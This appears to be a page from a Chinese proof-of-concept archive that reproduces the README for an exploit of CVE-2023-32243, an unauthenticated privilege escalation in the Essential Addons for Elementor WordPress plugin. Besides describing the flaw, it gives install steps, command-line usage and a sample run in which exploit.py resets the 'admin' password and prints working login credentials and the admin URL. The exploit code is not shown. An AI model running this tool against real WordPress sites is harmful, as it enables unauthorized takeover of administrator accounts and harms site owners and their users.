关联漏洞
描述
CVE-2023-32243 - Essential Addons for Elementor 5.4.0-5.7.1 - Unauthenticated Privilege Escalation
介绍
# CVE-2023-32243.
Essential Addons for Elementor 5.4.0-5.7.1 - Unauthenticated Privilege Escalation
Info
---
The plugin does not validate the password reset key, which could allow unauthenticated attackers to reset arbitrary account's password to anything they want, by knowing the related email or username, gaining access to them
Python Setup
----
```
pip install -r requirements.txt
```
Exploit Details
----
https://patchstack.com/articles/critical-privilege-escalation-in-essential-addons-for-elementor-plugin-affecting-1-million-sites/
Usage
----
```
usage: exploit.py [-h] -u URL -p PASSWORD [-usr USERNAME]
options:
-h, --help show this help message and exit
-u URL, --url URL URL of the WordPress site
-p PASSWORD, --password PASSWORD
Password to set for the selected username
-usr USERNAME, --username USERNAME
Username of the user to reset if you already know it.
```
Example
----
```
python3 exploit.py --url http://wordpress.lan --password "adminadmin2"
Please select a username:
1. admin
> 1
Nonce value: f010bc2ac9
All Set! You can now login using the following credentials:
Username: admin
Password: adminadmin2
Admin Url: http://wordpress.lan/wp-admin/
```
文件快照
[4.0K] /data/pocs/c4a7aaeb14b3b316101f31856b88919b51e2a140
├── [8.7K] exploit.py
├── [ 34K] LICENSE
├── [1.2K] README.md
└── [ 18] requirements.txt
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。